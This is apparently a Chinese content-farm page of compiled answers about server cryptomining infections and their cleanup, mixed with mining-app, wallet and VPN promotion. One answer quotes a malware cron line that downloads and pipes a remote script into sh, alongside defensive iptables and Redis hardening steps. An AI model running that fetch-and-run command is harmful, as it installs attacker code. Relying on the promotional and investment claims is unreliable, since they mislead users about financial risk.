服务器挖矿软件
1. 如何用Linux服务器挖矿教程
今天早上起来一看,服务器脚本一个都没有启动!甚是奇怪,远程登录服务器,也是异常的卡,直到最后卡死,只好重新启动服务器!
启动之后没一会又会变卡,越来越卡,top查看进程!不觉又奇怪的进程,因为平常也不经常看!所以自己也搞不明白怎么回事儿!只好到群里问了问,说是被挖矿的挂了木马文件了,是由于redis的漏洞!
后来我自己发现,原来redis远程可以直接登录,原以为redis和mysql不开放登录权限就不会支持远程登录呢,看来是我想多了
看了好长时间才发现一个异常的进程,自启的进程 molibe !
找到进程位置 ps -ef|grep molibe ;
在tmp目录下,打开一看的确是有
chmod -x molibe 取消执行权限在来到/var/spool/cron下,cat root 查看定时器的执行发现之前脚本都被改了,顾不得删除cron,service crond restart 重新启动,再有就时kill 掉molibe进程
这样大概整个就结束了!但是根本是因为redis漏洞,所以还是补上吧
首先修改redis'端口,找到redis.conf文件 port **** 修改端口号再有就是必须修改密码 # requirepass ******** 去除#号重新启动 /redis/src/redis-server /redis/redis-conf
启动成功之后
redis/redis-cli -p ****(端口) -a *****(密码)
2. 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
3. 怎么挖矿获得比特币
(以小米手机8为例,基于安卓操作系统)
首先注册一个数字钱包:在开始挖矿之前,需要注册一个靠谱的数字钱包用来存储你的挖矿成果,这里可以根据自己的需要使用一些支持手机端的钱包工具,不过一定要格外注意安全。目前最通用也最安全的数字钱包中,比较推荐使用火币网的充币地址做数字钱包。
接着完整注册之后,在右上角找到充币提币,点击进入。
最后这里找到需要挖的货币,点击充币,出现的一长串代码就是你的钱包地址,将它输入挖矿工具软件中,挖矿收益就会定期存入你的火币账户。
拓展资料:1、比特币(Bitcoin)的概念最初由中本聪在2008年11月1日提出,并于2009年1月3日正式诞生 。根据中本聪的思路设计发布的开源软件以及建构其上的P2P网络。
比特币是一种P2P形式的数字货币。比特币的交易记录公开透明 。点对点的传输意味着一个去中心化的支付系统。
2、与大多数货币不同,比特币不依靠特定货币机构发行,它依据特定算法,通过大量的计算产生,比特币经济使用整个P2P网络中众多节点构成的分布式数据库来确认并记录所有的交易行为,并使用密码学的设计来确保货币流通各个环节安全性。
3、P2P的去中心化特性与算法本身可以确保无法通过大量制造比特币来人为操控币值。基于密码学的设计可以使比特币只能被真实的拥有者转移或支付。这同样确保了货币所有权与流通交易的匿名性。比特币其总数量非常有限,具有稀缺性。该货币系统曾在4年内只有不超过1050万个,之后的总数量将被永久限制在2100万个 。
4、比特币挖矿,就是用于赚取比特币的电脑,这类电脑一般有专业的挖矿芯片,多采用烧显卡的方式工作,耗电量较大。用户用个人计算机下载软件然后运行特定算法,与远方服务器通讯后可得到相应比特币,是获取比特币的方式之一。
4. 虚拟币,比如比特 莱特所谓挖矿是什么
问清楚了也没有用,不如自己尝试下,挖矿到底是什么。
哈鱼矿工是一个提供区块链数字挖矿的软件,他可以一键挖矿,而且还可以随时提现到支付宝,贼方便,欢迎试下。
5. 怎么找到linux 服务器 挖矿软件
今天早上起来一看,服务器脚本一个都没有启动!甚是奇怪,远程登录服务器,也是异常的卡,直到最后卡死,只好重新启动服务器!启动之后没一会又会变卡,越来越卡,top查看进程!不觉又奇怪的进程,因为平常也不经常看!所以自己也搞不明白怎么回
6. pi币Pi Network打不开了,打不开了,跑路了
这个东西现在还是起步阶段,简单的来说他还是中心化的,并不是区块链,应该是没有跑路。
因为是国外的挖矿软件,加上挖矿的人太多,目前还是中心化的挖矿,还没上主网去中区化,所以人多了在中心化的服务器上就很卡。很正常,等主网上线后,就不再需要中心化的服务器了,到时运行在链上节点中,就不可能再卡。
PI币PiNetwork如果实在登录不了无法登录,一直转圈圈,那么你可以在你手机应用商店下载VPN(加速器)再登。
VPN加速器下好后,手机转换成无线网模式(4G可能还是卡。)然后打开VPN连接好后,再打开挖矿PI币的APP,就可以登了。有的VPN是免费的也可以用,但是我建议花不了多少钱可以买一个更好的VPN,毕竟不给钱的翻墙又给力的很少。
进pi币的其他方法:
“最近Pi后台很难登陆,给大家一个秒进的方法:用4G流量登录如果一直转圈10秒进不了,就关掉流量,就会出现蓝色英文,再打开流量,再去点击蓝色英文,转圈圈一会就能进。
还进不了就切换无线网,同样的方法关掉无线网,出现蓝色英文,再打开无线网 再点击蓝色英文,转圈圈一会就进去了,点击闪电️开启挖矿,亲们抓紧试试!”
7. 求助服务器被挖矿程序入侵,如何排查
新客户于最近向我们SINE安全公司咨询,说他的服务器经常卡的网站无法打开,远程连接
服务器的慢的要命,有时候PING值都达到300-500之间,还经常掉包,听客户这么一说,一般
会判断为受到了CC+DDOS混合流量攻击,再具体一问,说是机房那面没有受到流量攻击,这
就有点奇怪了,不是流量攻击,还导致服务器卡,网站无法打开,这是什么攻击?为了解决客
户服务器卡的问题,我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。
挖矿木马还设计了挖矿进程如果被客户强制停止后,会自动启动继续挖矿,达到不间断的挖矿,
仔细检查发现是通过设置了每个小时执行任务计划,远程下载shell挖矿木马,然后执行,检查
当前进程是否存在,不存在就启动挖矿木马,进行挖矿。
对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据,以及感染蠕虫的病
毒,如果数据被加密那损失大了,客户是做平台的,里面的客户数据很重要,找出挖矿木马后,
客户需要知道服务器到底是如何被攻击的? 被上传挖矿木马的? 防止后期再出现这样的攻击
状况。
通过我们安全工程师的安全检测与分析,发现该服务器使用的是apache tomcat环境,平台的开
发架构是JSP+oracle数据库,apache tomcat使用的是2016年的版本,导致该apache存在严重
的远程执行命令漏洞,入侵者可以通过该漏洞直接入侵服务器,拿到服务器的管理员权限,
SINE安全工程师立即对apache 漏洞进行修复,并清除木马,至此问题得以解决,客户服务器
一切稳定运行,网站打开正常。
8. 蔚来员工利用公司服务器挖矿,这一行为是否违法
蔚来员工利用职务之便,从2021年2月开始使用公司服务器进行挖矿,从中获取利益,这个行为明显已经触犯了我国的相关法律。
其实利用公司资源进行非法挖矿行为早有先例,在2018年1月到5月期间,网络一个运维员工就曾经在网络公司服务器上安装挖矿程序,通过公司的资源谋取暴利,之后将挖矿所得的虚拟货币卖出,从中获得10万元人民币,后来,在网络公司的追查下,这名员工才被发现,并且因涉嫌非法控制计算机信息系统罪被判有期徒刑三年,并处罚金1.1万元,扣押违法所得10万元整。
而对于挖矿这个行为,国家是坚决打击的,目前相关的省份也出台了相关的文件,表面上只是提高了挖矿公司的电费,实际上是为了让从事挖矿的人员知难而退,因为电费一旦上涨,那么相对应的挖矿成本也就增加了。
综上所述,该蔚来员工利用职务之便进行挖矿行为,已经涉嫌非法控制计算机信息系统罪,所以,他极有可能会因为此罪名而被起诉。
9. 如何通过云计算服务器实现比特币挖矿
各公有云厂商都明确要求不允许使用云服务器进行挖矿,否则会被封禁的;
挖矿主要使用的是GPU,目前各公有云厂商提供的GPU服务器都比较贵的,从性价比上来说不划算,还不如用专用芯片;
当然,有黑客通过漏洞入侵服务器,在上面植入挖矿程序和脚本,进行挖矿操作,但这个本身是不合法的行为。